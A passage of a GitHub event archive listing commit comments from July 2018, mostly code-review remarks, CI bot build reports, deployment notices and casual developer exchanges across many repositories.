\"deploy-ibm-yp-us-south-ecrane-us.ibm.com-test-20180712-033850\") to [test](https://console.bluemix.net/apps/324526a3-62cd-45d8-8f95-d361c78580e7?env_id=ibm:yp:us-south \"ibm:yp:us-south:ecrane@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-12T03:38:51Z"}
{"id":"7953763041","type":"CommitCommentEvent","actor":{"login":"bayobadmos04"},"repo":{"name":"bayobadmos04/EPESA"},"payload":{"comment":{"id":29679719,"position":7,"line":7,"path":"EPCOIN","commit_id":"6ae03ec953f6fb5fbd422363b160fcaa5840bb1c","created_at":"2018-07-12T03:39:53Z","updated_at":"2018-07-12T03:39:53Z","author_association":"OWNER","body":"EPCOIN\r\n"}},"created_at":"2018-07-12T03:39:53Z"}
{"id":"7953763269","type":"CommitCommentEvent","actor":{"login":"surhudm"},"repo":{"name":"rmurata/GalSim"},"payload":{"comment":{"id":29679720,"position":null,"line":null,"path":null,"commit_id":"37848d7e3d175de2cd7b66b07cb8e076b3b2a67c","created_at":"2018-07-12T03:39:59Z","updated_at":"2018-07-12T03:39:59Z","author_association":"NONE","body":"@rmurata, This is not the correct way to do it. This will hardcode the number 10, and that is not really what you want."}},"created_at":"2018-07-12T03:39:59Z"}
{"id":"7953763460","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29679721,"position":121,"line":68,"path":"3-26a/3-26a.cpp","commit_id":"2f248aaf8e6f71f56938fcbfcde449c40235784a","created_at":"2018-07-12T03:40:04Z","updated_at":"2018-07-12T03:40:04Z","author_association":"COLLABORATOR","body":"山本　補足\r\n上記のif文の記載の仕方について下記のようになっています。\r\n---------------------------------------\r\nif ( 条件 ) {\r\n  処理\r\n}\r\nelse {\r\n  処理\r\n}\r\n---------------------------------------\r\n\r\n現場によっては、下記のように書く場合もありますので、現場に入ったらどちらで書かれているか、コードを確認してください。\r\n---------------------------------------\r\nif ( 条件 ) {\r\n  処理\r\n} else {\r\n  処理\r\n}\r\n---------------------------------------\r\n\r\n"}},"created_at":"2018-07-12T03:40:04Z"}
{"id":"7953764921","type":"CommitCommentEvent","actor":{"login":"Arnish"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29679724,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-12T03:40:38Z","updated_at":"2018-07-12T03:40:38Z","author_association":"NONE","body":"yep! I have these along with the pokecord prefix and token ones, still doesn't work for some reason. The commands go into discord right? \r\n\"OwnerID\": \"_______\",\r\n\"UserbotPrefix\": \"/\""}},"created_at":"2018-07-12T03:40:38Z"}
{"id":"7953766332","type":"CommitCommentEvent","actor":{"login":"Arnish"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29679726,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-12T03:41:12Z","updated_at":"2018-07-12T03:41:12Z","author_association":"NONE","body":"Yep i copy'd my ID using Dev mode on discord app and right clicking my name"}},"created_at":"2018-07-12T03:41:12Z"}
{"id":"7953767733","type":"CommitCommentEvent","actor":{"login":"Arnish"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29679729,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-12T03:41:44Z","updated_at":"2018-07-12T03:41:44Z","author_association":"NONE","body":"Also is there a way to stop the bot from saying \"le pokemans xd\" after every catch haha"}},"created_at":"2018-07-12T03:41:44Z"}
{"id":"7953768624","type":"CommitCommentEvent","actor":{"login":"rmurata"},"repo":{"name":"rmurata/GalSim"},"payload":{"comment":{"id":29679730,"position":null,"line":null,"path":null,"commit_id":"37848d7e3d175de2cd7b66b07cb8e076b3b2a67c","created_at":"2018-07-12T03:42:06Z","updated_at":"2018-07-12T03:42:06Z","author_association":"OWNER","body":"Thanks! \r\nI thought only I will use this function. \r\n\r\nI will change a bit now."}},"created_at":"2018-07-12T03:42:06Z"}
{"id":"7953768833","type":"CommitCommentEvent","actor":{"login":"martinpgaunt"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29679731,"position":17,"line":1517,"path":"src/wallet/rpcwallet.cpp","commit_id":"dbe6dd64e43d80e4d2acc7454823d8276af87415","created_at":"2018-07-12T03:42:10Z","updated_at":"2018-07-12T03:42:10Z","author_association":"NONE","body":"Q"}},"created_at":"2018-07-12T03:42:10Z"}
{"id":"7953770897","type":"CommitCommentEvent","actor":{"login":"craneer"},"repo":{"name":"craneer/sample-cloud-native-toolchain-tutorial-20180518034150481"},"payload":{"comment":{"id":29679736,"position":null,"line":null,"path":null,"commit_id":"1109b44cd05fd2da7e701d780758e835b11443a2","created_at":"2018-07-12T03:43:05Z","updated_at":"2018-07-12T03:43:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/a25368d0-1ca9-4a96-a1fb-3a03dd5893c5?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180518034150481\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/379f9839-89e6-481d-b0e6-d7ccc392891f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180518034150481\") deployed [sample-cloud-native-toolchain-tutorial-20180518034150481](https://github.com/craneer/sample-cloud-native-toolchain-tutorial-20180518034150481/releases/tag/deploy-ibm-yp-us-south-ecrane-us.ibm.com-prod-20180712-034304 \"deploy-ibm-yp-us-south-ecrane-us.ibm.com-prod-20180712-034304\") to [prod](https://console.bluemix.net/apps/16c45df8-e20a-4f17-a125-48eae024e358?env_id=ibm:yp:us-south \"ibm:yp:us-south:ecrane@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-12T03:43:05Z"}
{"id":"7953772287","type":"CommitCommentEvent","actor":{"login":"martinpgaunt"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29679739,"position":33,"line":563,"path":"src/qt/bitcoingui.cpp","commit_id":"000abbb6b07410357a928768d7d56465ba0d3bac","created_at":"2018-07-12T03:43:39Z","updated_at":"2018-07-12T03:43:39Z","author_association":"NONE","body":"Mkdfh"}},"created_at":"2018-07-12T03:43:39Z"}
{"id":"7953774689","type":"CommitCommentEvent","actor":{"login":"liukun"},"repo":{"name":"qinyuhang/Pubkey"},"payload":{"comment":{"id":29679747,"position":8,"line":55,"path":"README.md","commit_id":"0a53ed0c928a9a06cc3d04872327f222bc7401e0","created_at":"2018-07-12T03:44:41Z","updated_at":"2018-07-12T03:44:41Z","author_association":"NONE","body":"Invalid line IMHO"}},"created_at":"2018-07-12T03:44:41Z"}
{"id":"7953776597","type":"CommitCommentEvent","actor":{"login":"niuwang"},"repo":{"name":"niuwang/guide"},"payload":{"comment":{"id":29679757,"position":null,"line":null,"path":null,"commit_id":"23e56e2fa19705e38b117a66fa6ea2d3ff205ad1","created_at":"2018-07-12T03:45:32Z","updated_at":"2018-07-12T03:45:32Z","author_association":"OWNER","body":"谢谢"}},"created_at":"2018-07-12T03:45:32Z"}
{"id":"7953777953","type":"CommitCommentEvent","actor":{"login":"argowang"},"repo":{"name":"argowang/CodeOfDuty"},"payload":{"comment":{"id":29679761,"position":4,"line":4,"path":"20180711/Max Area of Island.java","commit_id":"bbecb825006ab735f6b03856a1c93f51924bb814","created_at":"2018-07-12T03:46:08Z","updated_at":"2018-07-12T03:46:08Z","author_association":"OWNER","body":"Unnecessary declaration of variables."}},"created_at":"2018-07-12T03:46:08Z"}
{"id":"7953780083","type":"CommitCommentEvent","actor":{"login":"Zrcrobi"},"repo":{"name":"Zrcrobi/zrcrobi.github.io"},"payload":{"comment":{"id":29679769,"position":null,"line":null,"path":null,"commit_id":"94c3652890d92af0700b913948ee803b2f00f5ee","created_at":"2018-07-12T03:47:02Z","updated_at":"2018-07-12T03:47:02Z","author_association":"OWNER","body":"<head>\r\n<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<script>\r\n  (adsbygoogle = window.adsbygoogle || []).push({\r\n    google_ad_client: \"ca-pub-6059103655437524\",\r\n    enable_page_level_ads: true\r\n  });\r\n</script>\r\n</head>"}},"created_at":"2018-07-12T03:47:02Z"}
{"id":"7953780618","type":"CommitCommentEvent","actor":{"login":"billpine"},"repo":{"name":"melimore86/Data"},"payload":{"comment":{"id":29679770,"position":null,"line":null,"path":null,"commit_id":"6be475991ddaabe31cc8361a8ca8d22e83d38291","created_at":"2018-07-12T03:47:15Z","updated_at":"2018-07-12T03:47:15Z","author_association":"COLLABORATOR","body":"what are you working to do here?"}},"created_at":"2018-07-12T03:47:15Z"}
{"id":"7953782201","type":"CommitCommentEvent","actor":{"login":"billpine"},"repo":{"name":"melimore86/Data"},"payload":{"comment":{"id":29679772,"position":null,"line":null,"path":null,"commit_id":"4658dab08438e6f509cf2433b208085056ce4bfb","created_at":"2018-07-12T03:47:55Z","updated_at":"2018-07-12T03:47:55Z","author_association":"COLLABORATOR","body":"what errors are you still seeing?"}},"created_at":"2018-07-12T03:47:55Z"}
{"id":"7953784460","type":"CommitCommentEvent","actor":{"login":"billpine"},"repo":{"name":"melimore86/Data"},"payload":{"comment":{"id":29679777,"position":null,"line":null,"path":null,"commit_id":"7507843948d80bda5d160066d1ea1f80284aa205","created_at":"2018-07-12T03:48:49Z","updated_at":"2018-07-12T03:48:49Z","author_association":"COLLABORATOR","body":"The GLM scripts have not been updated, just the summary graphs and need to make tables to go with the summary scripts."}},"created_at":"2018-07-12T03:48:49Z"}
{"id":"7953786310","type":"CommitCommentEvent","actor":{"login":"TheSaltman"},"repo":{"name":"chibisov/drf-extensions"},"payload":{"comment":{"id":29679778,"position":null,"line":null,"path":null,"commit_id":"00712396be979aaa5a86246bee39284b5e5e8d71","created_at":"2018-07-12T03:49:34Z","updated_at":"2018-07-12T03:49:34Z","author_association":"NONE","body":"@thesunlover you could add https://github.com/chibisov/drf-extensions/archive/master.zip\r\nTo requirements.txt for now. "}},"created_at":"2018-07-12T03:49:34Z"}
{"id":"7953790718","type":"CommitCommentEvent","actor":{"login":"nerdgamer-mvm"},"repo":{"name":"NPsim/subserver_mvm"},"payload":{"comment":{"id":29679780,"position":94,"line":84,"path":"scripts/population/mvm_teien_rc3_showa_showdown.pop","commit_id":"e218bc47f33a14f0610246d33cc4b6c83eb28de8","created_at":"2018-07-12T03:51:23Z","updated_at":"2018-07-12T03:51:23Z","author_association":"NONE","body":"should be -9"}},"created_at":"2018-07-12T03:51:23Z"}
{"id":"7953791539","type":"CommitCommentEvent","actor":{"login":"rafacabral"},"repo":{"name":"luorhan/projetodg"},"payload":{"comment":{"id":29679781,"position":null,"line":null,"path":null,"commit_id":"e49036f0a8f05e55e02bb5ff45909953a3937312","created_at":"2018-07-12T03:51:43Z","updated_at":"2018-07-12T03:51:43Z","author_association":"COLLABORATOR","body":"esquece do acento"}},"created_at":"2018-07-12T03:51:43Z"}
{"id":"7953793018","type":"CommitCommentEvent","actor":{"login":"rmurata"},"repo":{"name":"rmurata/GalSim"},"payload":{"comment":{"id":29679783,"position":null,"line":null,"path":null,"commit_id":"37848d7e3d175de2cd7b66b07cb8e076b3b2a67c","created_at":"2018-07-12T03:52:20Z","updated_at":"2018-07-12T03:52:20Z","author_association":"OWNER","body":"updated here: https://github.com/rmurata/GalSim/commit/e475e704fb02acbc7b34e4952944ee5692e5be71 <https://github.com/rmurata/GalSim/commit/e475e704fb02acbc7b34e4952944ee5692e5be71>"}},"created_at":"2018-07-12T03:52:20Z"}
{"id":"7953793084","type":"CommitCommentEvent","actor":{"login":"nerdgamer-mvm"},"repo":{"name":"NPsim/subserver_mvm"},"payload":{"comment":{"id":29679784,"position":289,"line":1008,"path":"scripts/population/mvm_teien_rc3_showa_showdown.pop","commit_id":"e218bc47f33a14f0610246d33cc4b6c83eb28de8","created_at":"2018-07-12T03:52:21Z","updated_at":"2018-07-12T03:52:21Z","author_association":"NONE","body":"No need to specify like 3 times"}},"created_at":"2018-07-12T03:52:21Z"}
{"id":"7953793969","type":"CommitCommentEvent","actor":{"login":"xch91"},"repo":{"name":"qyf94/vue-scratchcard"},"payload":{"comment":{"id":29679785,"position":null,"line":null,"path":null,"commit_id":"c7fe227b3d799c938b685ecdfefb705e70c64c0b","created_at":"2018-07-12T03:52:46Z","updated_at":"2018-07-12T03:52:46Z","author_association":"NONE","body":"哦！原来是酱……那我来merge一下好了"}},"created_at":"2018-07-12T03:52:46Z"}
{"id":"7953794156","type":"CommitCommentEvent","actor":{"login":"gbolcer"},"repo":{"name":"unsiloai/syntaxnet-ops-hack"},"payload":{"comment":{"id":29679786,"position":null,"line":null,"path":null,"commit_id":"94d679299b25955021854ace750da6ceac4f02cb","created_at":"2018-07-12T03:52:50Z","updated_at":"2018-07-12T03:52:50Z","author_association":"NONE","body":"Thank you.  Trying it out now.  "}},"created_at":"2018-07-12T03:52:50Z"}
{"id":"7953796891","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679792,"position":null,"line":null,"path":null,"commit_id":"82e4f93434f67a118dee10e388f5f0cbd365000e","created_at":"2018-07-12T03:54:03Z","updated_at":"2018-07-12T03:54:03Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - Win64-Windows-7-VisualStudio-14: OK (2930 of 2932 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: BND diffs.\n * 2 tests had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T03:54:03Z"}
{"id":"7953798368","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18003/programming-term2"},"payload":{"comment":{"id":29679804,"position":null,"line":null,"path":null,"commit_id":"65add96f79f798e8189c4fe787e5017b230fba4f","created_at":"2018-07-12T03:54:42Z","updated_at":"2018-07-12T03:54:42Z","author_association":"NONE","body":"github上でファイルの中身が空になっています。\r\n納期までの提出をもって評価します。"}},"created_at":"2018-07-12T03:54:42Z"}
{"id":"7953800009","type":"CommitCommentEvent","actor":{"login":"Maayu2415"},"repo":{"name":"MetaMask/metamask-extension"},"payload":{"comment":{"id":29679814,"position":null,"line":null,"path":null,"commit_id":"573659c863995d91035aee55407b5edc8851443d","created_at":"2018-07-12T03:55:25Z","updated_at":"2018-07-12T03:55:25Z","author_association":"NONE","body":"![screenshot_20180712-092231_firefox](https://user-images.githubusercontent.com/40852375/42611767-faccd3d8-85c1-11e8-890e-023adec1f42f.jpg)\r\n"}},"created_at":"2018-07-12T03:55:25Z"}
{"id":"7953801051","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29679823,"position":null,"line":null,"path":null,"commit_id":"8ab41d6d1f1cd1a5cb6b80545e474be6f830519c","created_at":"2018-07-12T03:55:51Z","updated_at":"2018-07-12T03:55:51Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-12T03:55:51Z"}
{"id":"7953804060","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18010/programming-term2"},"payload":{"comment":{"id":29679834,"position":null,"line":null,"path":null,"commit_id":"98cb36ceab1837c00b34209822715ab70a2287d8","created_at":"2018-07-12T03:57:02Z","updated_at":"2018-07-12T03:57:02Z","author_association":"NONE","body":"要求を満たしていて、メッセージの表示も綺麗に出来ています。\r\n過不足無いコードだと思います。お疲れ様でした。"}},"created_at":"2018-07-12T03:57:02Z"}
{"id":"7953804784","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679835,"position":null,"line":null,"path":null,"commit_id":"d022a70906164211e1cfaa73227b73080583f16e","created_at":"2018-07-12T03:57:19Z","updated_at":"2018-07-12T03:57:19Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-12T03:57:19Z"}
{"id":"7953805112","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29679836,"position":null,"line":null,"path":null,"commit_id":"60c9222bb81bca4e9003fba02a5223642f211f57","created_at":"2018-07-12T03:57:28Z","updated_at":"2018-07-12T03:57:28Z","author_association":"OWNER","body":"Closes #10 "}},"created_at":"2018-07-12T03:57:28Z"}
{"id":"7953807546","type":"CommitCommentEvent","actor":{"login":"marvin5064"},"repo":{"name":"marvin5064/test-github-deploy-key"},"payload":{"comment":{"id":29679845,"position":null,"line":null,"path":null,"commit_id":"42850dd1b495d6a6d6db75bf16402eed58275919","created_at":"2018-07-12T03:58:32Z","updated_at":"2018-07-12T03:58:32Z","author_association":"OWNER","body":"LOL, why BGL\r\n\r\nprobably because of I had a script as\r\n```\r\ngit config --global user.email \"ops+ps-github@bitgamelabs.com\"\r\ngit config --global user.name \"Codeship\"\r\n```"}},"created_at":"2018-07-12T03:58:32Z"}
{"id":"7953807781","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29679849,"position":null,"line":null,"path":null,"commit_id":"d022a70906164211e1cfaa73227b73080583f16e","created_at":"2018-07-12T03:58:39Z","updated_at":"2018-07-12T03:58:39Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T03:58:39Z"}
{"id":"7953810136","type":"CommitCommentEvent","actor":{"login":"rmurata"},"repo":{"name":"rmurata/GalSim"},"payload":{"comment":{"id":29679854,"position":null,"line":null,"path":null,"commit_id":"37848d7e3d175de2cd7b66b07cb8e076b3b2a67c","created_at":"2018-07-12T03:59:40Z","updated_at":"2018-07-12T03:59:40Z","author_association":"OWNER","body":"Also updated from makeGalaxy function"}},"created_at":"2018-07-12T03:59:40Z"}
{"id":"7953811537","type":"CommitCommentEvent","actor":{"login":"me4502"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":29679857,"position":null,"line":null,"path":null,"commit_id":"7bb3f45ce126185a63a66e0c8f20f0f2de798797","created_at":"2018-07-12T04:00:14Z","updated_at":"2018-07-12T04:00:14Z","author_association":"CONTRIBUTOR","body":"Out of curiosity, what kind of performance differences are seen here? Just wondering what the impact of streams in a real world scenario are."}},"created_at":"2018-07-12T04:00:14Z"}
{"id":"7953815023","type":"CommitCommentEvent","actor":{"login":"marvin5064"},"repo":{"name":"marvin5064/test-github-deploy-key"},"payload":{"comment":{"id":29679866,"position":null,"line":null,"path":null,"commit_id":"42850dd1b495d6a6d6db75bf16402eed58275919","created_at":"2018-07-12T04:01:30Z","updated_at":"2018-07-12T04:01:30Z","author_association":"OWNER","body":"a side note to myself\r\n\r\nI was stuck for the `passphrase`\r\n\r\ne.g.\r\n```\r\nEnter passphrase for key '/Users/ABC/.ssh/id_rsa':\r\n```\r\n\r\nhere is a proper solution to set up ssh-key without passphrase (never ask passphrase input during process)\r\n```\r\nssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N \"\"\r\n```"}},"created_at":"2018-07-12T04:01:30Z"}
{"id":"7953815865","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18013/programming-term2"},"payload":{"comment":{"id":29679869,"position":null,"line":null,"path":null,"commit_id":"c20334ab321e5bae7ebc8e74235be5d4b1dc5133","created_at":"2018-07-12T04:01:51Z","updated_at":"2018-07-12T04:01:51Z","author_association":"NONE","body":"結果OKですが、変数a,b,cが使われている場面がないですね^^;\r\nまた、結果のメッセージは変数に保持してあげると繰り返し同じ文言を書かずに済みます。\r\nグー、チョキ、パーの部分はformat()メソッドで部分的に書き換えてもらうと、もっと良いかと思います。"}},"created_at":"2018-07-12T04:01:51Z"}
{"id":"7953817215","type":"CommitCommentEvent","actor":{"login":"binamov"},"repo":{"name":"Flexget/Flexget"},"payload":{"comment":{"id":29679874,"position":null,"line":null,"path":null,"commit_id":"043de1e6b0d0ec4b422f44b2157266171bda7cbe","created_at":"2018-07-12T04:02:25Z","updated_at":"2018-07-12T04:02:25Z","author_association":"NONE","body":"folks, this change broke me... how do i clear the stored cookie / get a new one?"}},"created_at":"2018-07-12T04:02:25Z"}
{"id":"7953818514","type":"CommitCommentEvent","actor":{"login":"QuinnBast"},"repo":{"name":"QuinnBast/CueB-Game-Engine"},"payload":{"comment":{"id":29679879,"position":null,"line":null,"path":null,"commit_id":"6d6eafa11f7dcd00b1c4b2958089581bcac34667","created_at":"2018-07-12T04:02:57Z","updated_at":"2018-07-12T04:02:57Z","author_association":"OWNER","body":"Progress on #9 "}},"created_at":"2018-07-12T04:02:57Z"}
{"id":"7953818893","type":"CommitCommentEvent","actor":{"login":"ramonmagalhaes"},"repo":{"name":"ramonmagalhaes/datasciencecoursera"},"payload":{"comment":{"id":29679881,"position":null,"line":null,"path":null,"commit_id":"f98f920d70246afb69bd8a7864db448b28241651","created_at":"2018-07-12T04:03:06Z","updated_at":"2018-07-12T04:03:06Z","author_association":"OWNER","body":"## This is a markdown"}},"created_at":"2018-07-12T04:03:06Z"}
{"id":"7953822852","type":"CommitCommentEvent","actor":{"login":"hhirsch"},"repo":{"name":"GlPortal/glPortal"},"payload":{"comment":{"id":29679890,"position":null,"line":null,"path":null,"commit_id":"8ce6f7dc8130df2680489de5ff0a86d28d824e29","created_at":"2018-07-12T04:04:43Z","updated_at":"2018-07-12T04:04:43Z","author_association":"MEMBER","body":"@wow2006 Can you rebase? One of the tests fail!"}},"created_at":"2018-07-12T04:04:43Z"}
{"id":"7953823279","type":"CommitCommentEvent","actor":{"login":"BlakeBr0"},"repo":{"name":"BlakeBr0/ExtendedCrafting"},"payload":{"comment":{"id":29679891,"position":null,"line":null,"path":null,"commit_id":"918d92e5a97f5ff94f089f228e068e711556cf63","created_at":"2018-07-12T04:04:54Z","updated_at":"2018-07-12T04:04:54Z","author_association":"OWNER","body":"*in some cases"}},"created_at":"2018-07-12T04:04:54Z"}
{"id":"7953824337","type":"CommitCommentEvent","actor":{"login":"kuonumber"},"repo":{"name":"kuonumber/201807_104_hr_bank"},"payload":{"comment":{"id":29679894,"position":null,"line":null,"path":null,"commit_id":"c8bada9e30d9804d72915395d7956e0b319bd95d","created_at":"2018-07-12T04:05:21Z","updated_at":"2018-07-12T04:05:21Z","author_association":"OWNER","body":"地區工作數量總和次數分配表.csv & 增加各地區各行業類別的次數分配表"}},"created_at":"2018-07-12T04:05:21Z"}
{"id":"7953824383","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29679895,"position":null,"line":null,"path":null,"commit_id":"ed5b7686c4dc47438e17333aa4aa2990a0a47ced","created_at":"2018-07-12T04:05:22Z","updated_at":"2018-07-12T04:05:22Z","author_association":"NONE","body":"基本的な動きはOKですが、気になった点を。\r\n・変数名Rockが大文字で始まっています。小文字で始めましょう。\r\n・現状、このプログラムだと整数以外が入力されたらエラー終了してしまいます。\r\n・入力不正以外の結果のメッセージは「グー」「チョキ」「パー」以外共通しているので、format()メソッドで部分的に置き換えてあげると良いと思います。"}},"created_at":"2018-07-12T04:05:22Z"}
{"id":"7953825980","type":"CommitCommentEvent","actor":{"login":"abitofarson"},"repo":{"name":"abitofarson/earlyPython"},"payload":{"comment":{"id":29679901,"position":null,"line":null,"path":null,"commit_id":"950f912781db6649769950e7105f09cff6e614ae","created_at":"2018-07-12T04:06:06Z","updated_at":"2018-07-12T04:06:06Z","author_association":"OWNER","body":"Basic Python programs to help me get acquainted with a new programming language."}},"created_at":"2018-07-12T04:06:06Z"}
{"id":"7953826041","type":"CommitCommentEvent","actor":{"login":"bluuman"},"repo":{"name":"bluuman/jwaim"},"payload":{"comment":{"id":29679902,"position":null,"line":null,"path":null,"commit_id":"83db2065153179f30383d692cc3038ddc34ba118","created_at":"2018-07-12T04:06:08Z","updated_at":"2018-07-12T04:06:08Z","author_association":"OWNER","body":"Teklad, I messed up the CMakeLists.txt file again, sorry about that. I'll revert it to non-debug once I push out the first working build."}},"created_at":"2018-07-12T04:06:08Z"}
{"id":"7953826621","type":"CommitCommentEvent","actor":{"login":"mboehm7"},"repo":{"name":"apache/systemml"},"payload":{"comment":{"id":29679905,"position":null,"line":null,"path":null,"commit_id":"58ab127619549b39a91480a79b087033a3f48b3a","created_at":"2018-07-12T04:06:24Z","updated_at":"2018-07-12T04:06:24Z","author_association":"CONTRIBUTOR","body":"@bertholdreinwald did you every encounter a similar travis issue (i.e., failed to download hdfs jar)?"}},"created_at":"2018-07-12T04:06:24Z"}
{"id":"7953829720","type":"CommitCommentEvent","actor":{"login":"Awzaw"},"repo":{"name":"CookieCode/WorldBorder"},"payload":{"comment":{"id":29679913,"position":null,"line":null,"path":null,"commit_id":"38bceaecb41cf3a94e8a4a2b8a714eb69bdb6756","created_at":"2018-07-12T04:07:45Z","updated_at":"2018-07-12T04:07:45Z","author_association":"NONE","body":"Dear @CookieCode:\nI regret to inform you that the release you submitted, named \"**AWorldBorder**\" (v1.1), for the project [WorldBorder](https://poggit.pmmp.io/ci/CookieCode/WorldBorder/WorldBorder) on 2018-07-12T02:31:31.000Z, has been rejected.\n\n1) Plugin submissions can only target the latest PMMP release.\n\n2) The plugin will cause unwanted behaviour in worlds other than the default level.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-12T04:07:45Z"}
{"id":"7953830750","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18020/programming-term2"},"payload":{"comment":{"id":29679917,"position":null,"line":null,"path":null,"commit_id":"433615d4684d210b02bd5721a6c4400d0571061d","created_at":"2018-07-12T04:08:10Z","updated_at":"2018-07-12T04:08:10Z","author_association":"NONE","body":"課題について：\r\n動作としては問題なしです。整数以外の入力にも耐えられていますね。\r\n入力不正以外の場合の結果メッセージについては、グーチョキパー以外の部分をformat()メソッドなどを使って部分的に差し替えてあげると良いと思います。"}},"created_at":"2018-07-12T04:08:10Z"}
{"id":"7953832070","type":"CommitCommentEvent","actor":{"login":"gorlovivan"},"repo":{"name":"gorlovivan/suo-couchbase-snapshots"},"payload":{"comment":{"id":29679921,"position":39,"line":123,"path":"global_org_structure.json","commit_id":"c2a6bd6f2d3bbe14f8138cfc3bc3e31ff35e734e","created_at":"2018-07-12T04:08:46Z","updated_at":"2018-07-12T04:08:46Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-12T04:08:46Z"}
{"id":"7953832350","type":"CommitCommentEvent","actor":{"login":"finnkuusisto"},"repo":{"name":"badgerloop-software/pod"},"payload":{"comment":{"id":29679922,"position":null,"line":null,"path":null,"commit_id":"767cdb47b10355717743cb12af00019b089f56ca","created_at":"2018-07-12T04:08:53Z","updated_at":"2018-07-12T04:08:53Z","author_association":"CONTRIBUTOR","body":"Note to future humans: I had initially pushed this file to this middleware-staging branch, but then just created a new branch for it instead (spacex-telemetry)."}},"created_at":"2018-07-12T04:08:53Z"}
